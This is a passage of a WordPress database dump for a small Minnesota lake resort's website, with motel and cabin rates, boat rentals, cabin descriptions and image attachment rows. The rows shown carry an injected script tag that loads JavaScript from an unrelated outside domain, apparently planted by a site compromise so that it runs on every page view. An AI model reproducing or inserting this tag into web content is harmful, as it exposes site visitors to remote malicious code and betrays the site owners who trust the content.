Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$875.00,$1050.00,4\r\nCabins (#10 #11 #12),2,$175.00,$225.00,$875.00,\"$1,050.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,$975.00,\"$1,150.00\",8\r\nCamping Non Electric Site,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nCamping Electric Sites,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong>Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Lund Boat,$20.00,$100.00,\r\n15 H.P. 4 Stroke Yamaha Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2017-01-22 11:14:46','2017-01-22 17:14:46','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(431,2,'2017-01-22 11:20:30','2017-01-22 17:20:30','<img class=\"alignnone  wp-image-347\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC04841-300x225.jpg\" alt=\"\" width=\"471\" height=\"353\" /><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Boats','','inherit','closed','closed','','61-revision-v1','','','2017-01-22 11:20:30','2017-01-22 17:20:30','',61,'http://ashbyresort.com/61-revision-v1/',0,'revision','',0),(433,2,'2017-01-22 11:22:17','2017-01-22 17:22:17','<img class=\"alignnone  wp-image-347\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC04841-300x225.jpg\" alt=\"\" width=\"471\" height=\"353\" />\r\nYou can rent our 20\' pontoon for a day or week and enjoy fishing comfortably while enjoying all the coves and bays that Pelican Lake has to offer.<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Boats','','inherit','closed','closed','','61-revision-v1','','','2017-01-22 11:22:17','2017-01-22 17:22:17','',61,'http://ashbyresort.com/61-revision-v1/',0,'revision','',0),(434,2,'2017-01-22 11:27:16','2017-01-22 17:27:16','Love to stay at a New Cabin - <a href=\"http://ashbyresort.com/calendar/\">Click here to book it</a>\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3937-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-378\" />\r\n\r\n\r\n<img class=\"alignnone wp-image-76 size-full\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/04b_04.jpg\" alt=\"04b_04\" width=\"626\" height=\"682\" />\r\n\r\n&nbsp;\r\n\r\n<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','New Cabins','','inherit','closed','closed','','52-revision-v1','','','2017-01-22 11:27:16','2017-01-22 17:27:16','',52,'http://ashbyresort.com/52-revision-v1/',0,'revision','',0),(436,2,'2017-01-22 11:29:37','2017-01-22 17:29:37','Love to stay at a New Cabin - <a href=\"http://ashbyresort.com/calendar/\">Click here to book it</a>\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3937-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-378\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-380\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3946-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-386\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-382\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3938-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-379\" />\r\n\r\n\r\n<img class=\"alignnone wp-image-76 size-full\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/04b_04.jpg\" alt=\"04b_04\" width=\"626\" height=\"682\" />\r\n\r\n&nbsp;\r\n\r\n<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','New Cabins','','inherit','closed','closed','','52-revision-v1','','','2017-01-22 11:29:37','2017-01-22 17:29:37','',52,'http://ashbyresort.com/52-revision-v1/',0,'revision','',0),(437,2,'2017-01-22 11:31:56','2017-01-22 17:31:56','Love to stay at a New Cabin - <a href=\"http://ashbyresort.com/calendar/\">Click here to book it</a>\r\nThis is one of the newer cabins located on the swimming beach.  It is a 2 bedroom with 1 bath.  There is also a queen size futon and hide-a-bed sofa in the livingroom.  Enjoy looking over the lake sitting at the breakfast bar or on the deck.<img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3937-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-378\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-380\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3946-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-386\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-382\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3938-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-379\" />\r\n\r\n\r\n<img class=\"alignnone wp-image-76 size-full\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/04b_04.jpg\" alt=\"04b_04\" width=\"626\" height=\"682\" />\r\n\r\n&nbsp;\r\n\r\n<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','New Cabins','','inherit','closed','closed','','52-revision-v1','','','2017-01-22 11:31:56','2017-01-22 17:31:56','',52,'http://ashbyresort.com/52-revision-v1/',0,'revision','',0),(438,2,'2017-01-22 11:33:23','2017-01-22 17:33:23','Love to stay at a New Cabin - <a href=\"http://ashbyresort.com/calendar/\">Click here to book it</a>\r\nThis is one of the newer cabins located on the swimming beach.  It is a 2 bedroom with 1 bath.  There is also a queen size futon and hide-a-bed sofa in the livingroom.  Enjoy looking over the lake sitting at the breakfast bar or on the deck.  There is a full kitchen, central air conditioning and television.\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3937-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-378\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-380\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3946-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-386\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-382\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3938-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-379\" />\r\n\r\n\r\n<img class=\"alignnone wp-image-76 size-full\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/04b_04.jpg\" alt=\"04b_04\" width=\"626\" height=\"682\" />\r\n\r\n&nbsp;\r\n\r\n<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','New Cabins','','inherit','closed','closed','','52-revision-v1','','','2017-01-22 11:33:23','2017-01-22 17:33:23','',52,'http://ashbyresort.com/52-revision-v1/',0,'revision','',0),(439,2,'2017-01-22 11:34:44','2017-01-22 17:34:44','Love to stay at a New Cabin - <a href=\"http://ashbyresort.com/calendar/\">Click here to book it</a>\r\n#13 is one of the newer cabins located on the swimming beach.  It is a 2 bedroom with 1 bath.  There is also a queen size futon and hide-a-bed sofa in the livingroom.  Enjoy looking over the lake sitting at the breakfast bar or on the deck.  There is a full kitchen, central air conditioning and television. This unit is handicap accessible.\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3937-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-378\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-380\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3946-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-386\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-382\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3938-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-379\" />\r\n\r\n\r\n<img class=\"alignnone wp-image-76 size-full\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/04b_04.jpg\" alt=\"04b_04\" width=\"626\" height=\"682\" />\r\n\r\n&nbsp;\r\n\r\n<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','New Cabins','','inherit','closed','closed','','52-revision-v1','','','2017-01-22 11:34:44','2017-01-22 17:34:44','',52,'http://ashbyresort.com/52-revision-v1/',0,'revision','',0),(440,2,'2017-01-22 11:42:59','2017-01-22 17:42:59','Love to stay at a New Cabin - <a href=\"http://ashbyresort.com/calendar/\">Click here to book it</a>\r\n#13 is one of the newer cabins located on the swimming beach.  It is a 2 bedroom with 1 bath.  There is also a queen size futon and hide-a-bed sofa in the livingroom.  Enjoy looking over the lake sitting at the breakfast bar or on the deck.  There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3937-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-378\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-380\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3946-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-386\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-382\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3938-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-379\" />\r\n\r\n\r\n#14 is also one of the newer cabins and is 2 bedroom with 1 bath.  There is also a queen size futon and hide-a-bed sofa in the livingroom.\r\nThe deck over looks the lake and this cabin has a fire ring and patio.  There is a full kitchen, central air conditioning and television.\r\nThis is a No Smoking, no Pets unit.\r\n\r\n\r\n<img class=\"alignnone wp-image-76 size-full\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/04b_04.jpg\" alt=\"04b_04\" width=\"626\" height=\"682\" />\r\n\r\n&nbsp;\r\n\r\n\r\n<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','New Cabins','','inherit','closed','closed','','52-revision-v1','','','2017-01-22 11:42:59','2017-01-22 17:42:59','',52,'http://ashbyresort.com/52-revision-v1/',0,'revision','',0),(441,2,'2017-01-22 11:43:59','2017-01-22 17:43:59','Love to stay at a New Cabin - <a href=\"http://ashbyresort.com/calendar/\">Click here to book it</a>\r\n#13 is one of the newer cabins located on the swimming beach.  It is a 2 bedroom with 1 bath.  There is also a queen size futon and hide-a-bed sofa in the livingroom.  Enjoy looking over the lake sitting at the breakfast bar or on the deck.  There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3937-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-378\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-380\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3946-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-386\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-382\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3938-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-379\" />\r\n\r\n\r\n#14 is also one of the newer cabins and is 2 bedroom with 1 bath.  There is also a queen size futon and hide-a-bed sofa in the livingroom.\r\nThe deck over looks the lake and this cabin has a fire ring and patio.  There is a full kitchen, central air conditioning and television.\r\nThis is a No Smoking, no Pets unit.\r\n\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-354\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-380\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-382\" />\r\n\r\n<img class=\"alignnone wp-image-76 size-full\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/04b_04.jpg\" alt=\"04b_04\" width=\"626\" height=\"682\" />\r\n\r\n&nbsp;\r\n\r\n\r\n<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','New Cabins','','inherit','closed','closed','','52-revision-v1','','','2017-01-22 11:43:59','2017-01-22 17:43:59','',52,'http://ashbyresort.com/52-revision-v1/',0,'revision','',0),(442,2,'2017-01-22 11:51:07','2017-01-22 17:51:07','Love to stay at a New Cabin - <a href=\"http://ashbyresort.com/calendar/\">Click here to book it</a>\r\n#13 is one of the newer cabins located on the swimming beach.  It is a 2 bedroom with 1 bath.  There is also a queen size futon and hide-a-bed sofa in the livingroom.  Enjoy looking over the lake sitting at the breakfast bar or on the deck.  There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSC05132-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-115\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3937-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-378\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-380\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3946-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-386\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-382\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3938-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-379\" />\r\n\r\n\r\n#14 is also one of the newer cabins and is 2 bedroom with 1 bath.  There is also a queen size futon and hide-a-bed sofa in the livingroom.\r\nThe deck over looks the lake and this cabin has a fire ring and patio.  There is a full kitchen, central air conditioning and television.\r\nThis is a No Smoking, no Pets unit.\r\n\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-354\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-380\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-382\" />\r\n\r\n<img class=\"alignnone wp-image-76 size-full\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/04b_04.jpg\" alt=\"04b_04\" width=\"626\" height=\"682\" />\r\n\r\n&nbsp;\r\n\r\n\r\n<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','New Cabins','','inherit','closed','closed','','52-revision-v1','','','2017-01-22 11:51:07','2017-01-22 17:51:07','',52,'http://ashbyresort.com/52-revision-v1/',0,'revision','',0),(443,2,'2017-01-22 11:53:59','2017-01-22 17:53:59','Love to stay at a New Cabin - <a href=\"http://ashbyresort.com/calendar/\">Click here to book it</a>\r\n<strong>#13</strong>\r\n This is one of the newer cabins located on the swimming beach.  It is a 2 bedroom with 1 bath.  There is also a queen size futon and hide-a-bed sofa in the livingroom.  Enjoy looking over the lake sitting at the breakfast bar or on the deck.  There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSC05132-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-115\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3937-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-378\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-380\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3946-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-386\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-382\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3938-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-379\" />\r\n\r\n\r\n<strong>#14</strong>\r\nIs also one of the newer cabins and is 2 bedroom with 1 bath.  There is also a queen size futon and hide-a-bed sofa in the livingroom.\r\nThe deck over looks the lake and this cabin has a fire ring and patio.  There is a full kitchen, central air conditioning and television.\r\nThis is a No Smoking, no Pets unit.\r\n\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3477-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-354\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3939-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-380\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3942-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-382\" />\r\n\r\n<img class=\"alignnone wp-image-76 size-full\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/04b_04.jpg\" alt=\"04b_04\" width=\"626\" height=\"682\" />\r\n\r\n&nbsp;\r\n\r\n\r\n<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','New Cabins','','inherit','closed','closed','','52-revision-v1','','','2017-01-22 11:53:59','2017-01-22 17:53:59','',52,'http://ashbyresort.com/52-revision-v1/',0,'revision','',0),(444,2,'2017-01-22 12:01:15','2017-01-22 18:01:15','<img width=\"1280\" height=\"960\" title=\"DSCN3472\" class=\"so-widget-image\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3472.jpg\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3472.jpg 1280w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3472-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3472-768x576.jpg 768w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3472-1024x768.jpg 1024w\">\r\n<img width=\"153\" height=\"72\" title=\"pedal_minnesota_logo\" class=\"so-widget-image\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/pedal_minnesota_logo.png\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/pedal_minnesota_logo.png 153w, http://ashbyresort.com/wp-content/uploads/2016/03/pedal_minnesota_logo-150x72.png 150w\">\r\n<img width=\"96\" height=\"51\" title=\"usa_logo\" class=\"so-widget-image\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/usa_logo.png\" srcset=\"\">\r\n<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot.&nbsp;</h3>\r\n<h5 style=\"text-align: center;\"><em>Mike and Diane Bovee</em></h5><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Explore Minnesota','','inherit','closed','closed','','2-revision-v1','','','2017-01-22 12:01:15','2017-01-22 18:01:15','',2,'http://ashbyresort.com/2-revision-v1/',0,'revision','',0),(445,2,'2017-01-22 12:02:30','2017-01-22 18:02:30','<img width=\"153\" height=\"72\" title=\"pedal_minnesota_logo\" class=\"so-widget-image\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/pedal_minnesota_logo.png\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/pedal_minnesota_logo.png 153w, http://ashbyresort.com/wp-content/uploads/2016/03/pedal_minnesota_logo-150x72.png 150w\">\r\n<img width=\"96\" height=\"51\" title=\"usa_logo\" class=\"so-widget-image\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/usa_logo.png\" srcset=\"\">\r\n<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot.&nbsp;</h3>\r\n<h5 style=\"text-align: center;\"><em>Mike and Diane Bovee</em></h5><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Explore Minnesota','','inherit','closed','closed','','2-revision-v1','','','2017-01-22 12:02:30','2017-01-22 18:02:30','',2,'http://ashbyresort.com/2-revision-v1/',0,'revision','',0),(446,2,'2017-01-22 12:10:31','2017-01-22 18:10:31','<img width=\"100\" height=\"100\" title=\"mnMap\" class=\"so-widget-image\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/mnMap.png\" srcset=\"\">\r\n<img width=\"153\" height=\"72\" title=\"pedal_minnesota_logo\" class=\"so-widget-image\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/pedal_minnesota_logo.png\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/pedal_minnesota_logo.png 153w, http://ashbyresort.com/wp-content/uploads/2016/03/pedal_minnesota_logo-150x72.png 150w\">\r\n<img width=\"96\" height=\"51\" title=\"usa_logo\" class=\"so-widget-image\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/usa_logo.png\" srcset=\"\">\r\n<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot.&nbsp;</h3>\r\n<h5 style=\"text-align: center;\"><em>Mike and Diane Bovee</em></h5><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Explore Minnesota','','inherit','closed','closed','','2-revision-v1','','','2017-01-22 12:10:31','2017-01-22 18:10:31','',2,'http://ashbyresort.com/2-revision-v1/',0,'revision','',0),(447,2,'2017-01-22 12:23:44','2017-01-22 18:23:44','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3227','','inherit','open','closed','','dscn3227','','','2018-02-10 18:51:03','2018-02-11 00:51:03','',0,'http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3227.jpg',6,'attachment','image/jpeg',0),(448,2,'2017-01-22 12:25:42','2017-01-22 18:25:42','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3893','','inherit','open','closed','','dscn3893','','','2017-01-22 12:49:18','2017-01-22 18:49:18','',0,'http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3893.jpg',5,'attachment','image/jpeg',0),(449,2,'2017-01-22 12:26:37','2017-01-22 18:26:37','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN4031','','inherit','open','closed','','dscn4031','','','2017-01-22 12:29:05','2017-01-22 18:29:05','',0,'http://ashbyresort.com/wp-content/uploads/2017/01/DSCN4031.jpg',5,'attachment','image/jpeg',0),(450,2,'2017-01-22 12:27:20','2017-01-22 18:27:20','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN4048','','inherit','open','closed','','dscn4048','','','2017-01-22 12:27:20','2017-01-22 18:27:20','',0,'http://ashbyresort.com/wp-content/uploads/2017/01/DSCN4048.jpg',0,'attachment','image/jpeg',0),(451,2,'2017-01-22 12:45:47','2017-01-22 18:45:47','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN4045','','inherit','open','closed','','dscn4045','','','2017-01-22 12:45:47','2017-01-22 18:45:47','',0,'http://ashbyresort.com/wp-content/uploads/2017/01/DSCN4045.jpg',0,'attachment','image/jpeg',0),(452,2,'2017-01-22 12:47:39','2017-01-22 18:47:39','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','IMAG0458-1','','inherit','open','closed','','imag0458-1','','','2017-01-25 14:58:43','2017-01-25 20:58:43','',81,'http://ashbyresort.com/wp-content/uploads/2017/01/IMAG0458-1.jpg',0,'attachment','image/jpeg',0),(453,2,'2017-01-22 12:48:35','2017-01-22 18:48:35','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN2617','','inherit','open','closed','','dscn2617','','','2018-02-10 18:51:03','2018-02-11 00:51:03','',0,'http://ashbyresort.com/wp-content/uploads/2017/01/DSCN2617.jpg',5,'attachment','image/jpeg',0),(454,2,'2017-01-22 13:01:00','2017-01-22 19:01:00','Love to stay at a New Cabin - <a href=\"http://ashbyresort.com/calendar/\">Click here to book it</a>\r\n<strong>#13</strong>\r\nThis is one of the newer cabins located on the swimming beach. It is a 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom. Enjoy looking over the lake sitting at the breakfast bar or on the deck. There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.\r\n<img class=\"alignnone size-medium wp-image-115\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSC05132-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-378\" 